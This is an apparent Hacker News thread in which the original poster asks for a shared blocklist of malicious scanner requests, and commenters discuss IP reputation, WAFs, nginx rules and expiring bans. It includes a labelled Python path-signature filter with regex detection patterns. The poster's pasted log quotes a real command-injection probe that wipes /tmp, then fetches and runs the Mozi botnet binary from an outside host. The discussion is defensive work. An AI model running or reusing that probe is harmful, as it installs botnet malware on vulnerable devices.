by usernamebias on 4/7/21, 2:33 AM with 43 comments
I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this.
{ "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164" },
{ "offense": ".env", "ipAddress": "52.224.55.198" },
{ "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.115.18:53153/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1", "ipAddress": "115.58.115.18" }
Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what I'm currently doing. Ex. If request includes '.env'. Blocked!
I'd love to implement a more aggressive strategy, rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'.
Like an 'ad blocklist' we can use as middleware in our HTTP applications.
If something exists already, kindly point me to a Github.
by thephyber on 4/7/21, 3:12 AM
What you propose is very similar to what happens with email IP reputation. If you look at all of the effort that goes into verifying as few false positives and false negatives as possible, you should probably consider why that effort is put in. Example: what happens if a malicious user who works on behalf of a rival company to yours creates a Pull Request to your list with your customer’s IP addresses? Could you realistically identify the issue and the malicious user before it hurt your corporate reputation?
I don’t think your idea is bad, but you have to realize that the concept of an IP address as a proxy for an actor/reputation is not as valuable in recent years as it used to be. With IPv6 and cheap botnet access, your list will fill up with junk when the attacker spends very little effort to add new GET/POST rules and new clients.
I would recommend you spend some time considering how much you care about this particular cat and mouse game when CDNs and WAFs have already made products which cater to this need.
by ggm on 4/7/21, 2:40 AM
What are you going to do when the addresses belong to the US mil and are being promiscuously misused by lots of ISPs?
What are you going to do about politically motivated and other non-benign influences on the blacklist like wanting to boycott China?
(I work in a regional internet registry so I should declare my interest I guess)
by trinovantes on 4/7/21, 2:50 AM
by mjbrownie on 4/7/21, 3:07 AM
    # Default location: drop the connection without a response (nginx's
    # non-standard 444 closes the socket) and don't write a log line for it.
    location / {
        return 444;
        access_log off;
    }
    # Only the path prefixes you actually serve get real handling.
    location /a/ {
        ...
    }
by bradknowles on 4/7/21, 5:30 AM
IP address reputation based blocking was a concept that we saw back in the mid-90s when I was fighting spam as the Senior Internet Mail Administrator at AOL. It worked okay, for a while. It quickly became a game of cat-and-mouse, where some spammers wouldn’t care that we blocked them, but plenty others found various ways around the blocks we were implementing.
More than 25 years later, and the problem really hasn’t changed that much. You still get lots of people who think they can just block stuff by IP addresses and that will solve all the problems.
The best modern WAFs that I’ve seen in the past five to ten years are probabilistic at best. Set the rejection threshold too low, and you start getting way too many false positive hits. Set the rejection threshold too low, and too many attacks just skip right past the WAF. They are a tool you need to have in your toolbox and you need to make use of them, but they are weak protection, at best. They’re table stakes, which set a low bar for your attackers to clear.
Mod_Security is an excellent example of a free and relatively low effort WAF that you can implement, but there are alternatives. Fastly is a well known commercial CDN/WAF provider, but Cloudflare has their WAF service, AWS has a built-in service, etc.
If you really want to be secure against attackers, you need to make sure that every layer of your code is secure. Do all the standard network scanning and fuzzing tools. Have someone play red team against your system and see if they can penetrate your defenses. Use the source code analysis tools that are appropriate for your language — Fortify might not always be the right answer. Use the dynamic application security tools like the stuff from Contrast Security, where they can scan your object code as it is running in real time and monitor for all known vulnerabilities and attack patterns, and then update that list of things to scan for in real time.
Make sure you actually fix the weaknesses that are turned up by these tools. It doesn’t help you to identify a bunch of problems and then just leave them unfixed.
The OWASP stuff is a start, but they’re just skimming the surface. This is a true deepness with no bottom.
by zamalek on 4/7/21, 4:51 AM
A banned IP may be rotated to a legitimate user under many scenarios. Only ban/blackhole IPs for a limited duration.
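An added example, not code from the thread or from any commenter: a small Python request filter in the spirit of the OP's keyword/regex middleware (matching request paths against a signature list rather than blocking by IP alone), combined with zamalek's point that any IP ban should expire. The regexes are derived from the probe paths quoted in the OP's dataset; the class name, the one-object-per-line log parser, the sample log and its RFC 5737 addresses are all constructed for the example.

```python
import json
import re
import time
from typing import Dict, List, Optional

# Signatures derived from the probe paths quoted in the thread. Anchors and
# escapes matter: a bare substring check on ".env" would also block a benign
# request for "/docs/environment.html".
PROBE_PATTERNS: List[re.Pattern] = [re.compile(p) for p in (
    r"(^|/)\.env(\.[A-Za-z0-9_-]+)?$",        # .env, .env.bak, .env.local
    r"(^|/)boaform/admin/formLogin",         # router admin login probe
    r"(^|/)setup\.cgi\?.*\btodo=syscmd\b",   # setup.cgi command-injection probe
)]


class RequestFilter:
    """Path-signature filter with time-limited IP bans (hypothetical helper).

    A hit on a known probe path blocks the request and bans the client IP for
    ban_seconds; after that the IP is treated as new again, so an address that
    was later reassigned to a legitimate user is not blocked forever.
    """

    def __init__(self, patterns=PROBE_PATTERNS, ban_seconds: int = 3600):
        self.patterns = list(patterns)
        self.ban_seconds = ban_seconds
        self._bans: Dict[str, float] = {}  # ip -> unix time the ban expires

    def matched_pattern(self, path: str) -> Optional[str]:
        """Return the first signature that matches the request path, if any."""
        path = path.lstrip("/")
        for pat in self.patterns:
            if pat.search(path):
                return pat.pattern
        return None

    def check(self, ip: str, path: str, now: Optional[float] = None) -> str:
        """Return 'banned', 'block' or 'allow' for one request."""
        now = time.time() if now is None else now
        expiry = self._bans.get(ip)
        if expiry is not None:
            if now < expiry:
                return "banned"
            del self._bans[ip]  # ban has lapsed; forget the IP entirely
        if self.matched_pattern(path) is not None:
            self._bans[ip] = now + self.ban_seconds
            return "block"
        return "allow"

    def banned_ips(self, now: Optional[float] = None) -> List[str]:
        """Addresses whose ban is still in force at time `now`."""
        now = time.time() if now is None else now
        return sorted(ip for ip, exp in self._bans.items() if now < exp)


def load_offenses(text: str) -> List[dict]:
    """Parse the one-JSON-object-per-line format the OP's dataset uses."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed sample in the OP's format: two probe paths quoted in the thread
# plus one benign request, all from RFC 5737 documentation address ranges.
SAMPLE_LOG = """\
{ "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "192.0.2.10" }
{ "offense": ".env", "ipAddress": "198.51.100.20" }
{ "offense": "docs/environment.html", "ipAddress": "203.0.113.30" }
"""


def replay(text: str, ban_seconds: int = 3600, start: float = 0.0) -> List[str]:
    """Feed a dataset through the filter one request per second; return the decisions."""
    f = RequestFilter(ban_seconds=ban_seconds)
    return [f.check(e["ipAddress"], e["offense"], now=start + i)
            for i, e in enumerate(load_offenses(text))]


if __name__ == "__main__":
    for entry, decision in zip(load_offenses(SAMPLE_LOG), replay(SAMPLE_LOG)):
        print(f"{decision:6} {entry['ipAddress']:15} {entry['offense']}")
```

The `now` parameter exists so the expiry logic can be exercised deterministically; in a real middleware you would leave it at the default and let `check()` read the clock. Bans live only in process memory here, which is deliberate: they disappear on restart, and nothing on the filter accumulates the kind of permanent, shareable IP list the thread warns about.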
by jrockway on 4/7/21, 3:24 AM
How useful it is to rate limit on known attacks, I don't actually know. I feel like you really only need one request to exploit a 0day, so it probably provides no protection.
by AndroidKitKat on 4/7/21, 3:48 AM
by indymike on 4/7/21, 3:19 AM
by kjrose on 4/7/21, 4:11 AM
by TameAntelope on 4/7/21, 3:53 AM
by rognjen on 4/7/21, 8:59 AM
That means whenever a server is compromised it'd have this type of stuff installed and it'd start running it immediately.
That means two things: the list would indefinitely block servers that have been compromised but then cleaned up, and you'd never get a list comprehensive enough because servers are constantly being compromised.
by farazzz123 on 4/7/21, 5:08 AM
by farazzz123 on 4/7/21, 5:07 AM
by nickphx on 4/7/21, 5:14 AM
by jpmoral on 4/7/21, 5:11 AM
by ev1 on 4/7/21, 3:10 AM
by sgrinich on 4/7/21, 3:55 AM